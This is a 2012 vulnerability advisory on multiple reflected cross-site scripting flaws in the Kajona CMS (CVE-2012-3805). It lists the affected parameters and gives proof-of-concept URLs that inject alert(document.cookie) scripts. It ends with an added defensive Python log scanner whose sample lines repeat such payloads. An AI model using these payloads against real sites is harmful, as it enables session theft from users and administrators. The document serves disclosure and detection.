High-Tech Bridge HTB23097
History: Jun 20, 2012 - 12:00 a.m.

Multiple Cross-Site Scripting (XSS) in Kajona

2012-06-20 00:00:00
High-Tech Bridge
www.htbridge.com

CVSS2: 4.3 Medium
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

EPSS: 0.003 Low
EPSS Percentile: 66.4%

High-Tech Bridge Security Research Lab has discovered multiple Cross-Site Scripting (XSS) vulnerabilities in Kajona.

1. Multiple Cross-Site Scripting (XSS) in Kajona: CVE-2012-3805

1.1 Input passed via the “absender_name”, “absender_email” and “absender_nachricht” GET parameters to /index.php (when “page” is set to “contact”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the user’s browser session in the context of the affected website.
The following PoCs (Proof of Concept) demonstrate the vulnerabilities:
http://kajona/index.php?page=contact&absender_name="><script>alert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=contact&absender_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=contact&absender_nachricht=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.2 Input passed via the “comment_name”, “comment_subject” and “comment_message” GET parameters to /index.php (when “page” is set to “postacomment”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the user’s browser session in the context of the affected website.
The following PoCs demonstrate the vulnerabilities:
http://kajona/index.php?page=postacomment&comment_name="><script>alert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=postacomment&comment_subject=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?page=postacomment&comment_message=</textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.3 Input passed via the “module” GET parameter to /index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the user’s browser session in the context of the affected website.
The following PoC demonstrates the vulnerability:
http://kajona/index.php?module=<script>alert(document.cookie);</script%3E

1.4 Input passed via the “action” GET parameter to /index.php (when “module” is set to “login” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the user’s browser session in the context of the affected website.
The following PoC demonstrates the vulnerability:
http://kajona/index.php?module=login&admin=1&action=<script>alert(document.cookie%29;%3C/script%3E

1.5 Input passed via the “pv” and “pe” GET parameters to /index.php (when “module” is set to “user”, “action” is set to “list” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator’s browser session in the context of the affected website.
The following PoCs demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=user&action=list&pv="><script%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=list&pe=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.6 Input passed via the “user_username”, “user_email”, “user_forename”, “user_name”, “user_street”, “user_postal”, “user_city”, “user_tel” and “user_mobile” GET parameters to /index.php (when “module” is set to “user”, “action” is set to “newUser” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator’s browser session in the context of the affected website.
The following PoCs demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=user&action=newUser&user_username="%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_email=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_forename=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_street=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_postal=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_city=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_tel="%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=newUser&user_mobile=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.7 Input passed via the “group_name” and “group_desc” GET parameters to /index.php (when “module” is set to “user”, “action” is set to “groupNew” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator’s browser session in the context of the affected website.
The following PoCs demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=user&action=groupNew&group_name="%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=user&action=groupNew&group_desc=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.8 Input passed via the “name”, “browsername”, “seostring”, “keywords” and “folder_id” GET parameters to /index.php (when “module” is set to “pages”, “action” is set to “newPage” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator’s browser session in the context of the affected website.
The following PoCs demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=pages&action=newPage&name="><script%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&browsername=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&seostring=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&keywords=%3C/textarea%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newPage&folder_id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.9 Input passed via the “element_name” and “element_cachetime” GET parameters to /index.php (when “module” is set to “pages”, “action” is set to “newElement” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator’s browser session in the context of the affected website.
The following PoCs demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=pages&action=newElement&element_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=pages&action=newElement&element_cachetime=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.10 Input passed via the “aspect_name” GET parameter to /index.php (when “module” is set to “system”, “action” is set to “newAspect” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator’s browser session in the context of the affected website.
The following PoC demonstrates the vulnerability:
http://kajona/index.php?admin=1&module=system&action=newAspect&aspect_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.11 Input passed via the “filemanager_name”, “filemanager_path”, “filemanager_upload_filter” and “filemanager_view_filter” GET parameters to /index.php (when “module” is set to “filemanager”, “action” is set to “newRepo” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator’s browser session in the context of the affected website.
The following PoCs demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filemanager_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filemanager_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filemanager_upload_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=filemanager&action=newRepo&filemanager_view_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.12 Input passed via the “archive_title” and “archive_path” GET parameters to /index.php (when “module” is set to “downloads”, “action” is set to “newArchive” and “admin” is set to “1”) is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in the administrator’s browser session in the context of the affected website.
The following PoCs demonstrate the vulnerabilities:
http://kajona/index.php?admin=1&module=downloads&action=newArchive&archive_title=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://kajona/index.php?admin=1&module=downloads&action=newArchive&archive_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
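As a defender-side check added here (it is not part of the High-Tech Bridge advisory or of Kajona), the following Python scans web server access logs for requests to /index.php that send tag markup in any of the parameters listed in sections 1.1 to 1.12; it assumes the Apache common log format, and the log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# GET parameters that HTB23097 / CVE-2012-3805 lists as reflected unsanitised by
# /index.php (contact and comment forms, login, and the admin-side modules).
REFLECTED = {
    "absender_name", "absender_email", "absender_nachricht", "comment_name",
    "comment_subject", "comment_message", "module", "action", "pv", "pe",
    "user_username", "user_email", "user_forename", "user_name", "user_street",
    "user_postal", "user_city", "user_tel", "user_mobile", "group_name",
    "group_desc", "name", "browsername", "seostring", "keywords", "folder_id",
    "element_name", "element_cachetime", "aspect_name", "filemanager_name",
    "filemanager_path", "filemanager_upload_filter", "filemanager_view_filter",
    "archive_title", "archive_path",
}
# A '<' that opens or closes a tag, as in '"><script>' or '</textarea><script>'.
TAG_START = re.compile(r"</?[a-zA-Z]")
# Apache common log format: client, identd, user, [timestamp], "request", status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
# Constructed sample lines (not real traffic): an attribute break-out on the
# contact form, a textarea break-out in the admin user module, a benign
# submission, and a double-encoded payload against the login action.
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jun/2012:10:00:01 +0000] "GET /index.php?page=contact&absender_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E HTTP/1.1" 200 5123',
    '203.0.113.5 - - [20/Jun/2012:10:00:02 +0000] "GET /index.php?admin=1&module=user&action=groupNew&group_desc=%3C/textarea%3E%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 4100',
    '198.51.100.7 - - [20/Jun/2012:10:00:03 +0000] "GET /index.php?page=contact&absender_name=Jane+Doe&absender_email=jane%40example.org HTTP/1.1" 200 5123',
    '198.51.100.7 - - [20/Jun/2012:10:00:04 +0000] "GET /index.php?module=login&admin=1&action=%253Cscript%253Ealert%25281%2529%253C/script%253E HTTP/1.1" 200 3000',
]

def decode(value):
    # Percent-decode until stable so a double-encoded payload is not missed.
    while (decoded := unquote(value)) != value:
        value = decoded
    return value

def suspicious_params(path):
    # Advisory-listed parameters whose decoded value contains tag markup.
    parts = urlsplit(path)
    if not parts.path.endswith("/index.php"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    return sorted(n for n, vs in query.items()
                  if n in REFLECTED and any(TAG_START.search(decode(v)) for v in vs))

def scan_log(lines):
    # Yield (client, status, parameters) for each request that trips the check.
    for m in filter(None, map(LOG_RE.match, lines)):
        params = suspicious_params(m.group(2))
        if params:
            yield m.group(1), int(m.group(3)), params
```

A hit with a 200 status against a version at or below 3.4.1 is the case to triage first, since that is the range the CPE entry below marks as affected.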

CPE Name    Operator    Version
kajona      le          3.4.1
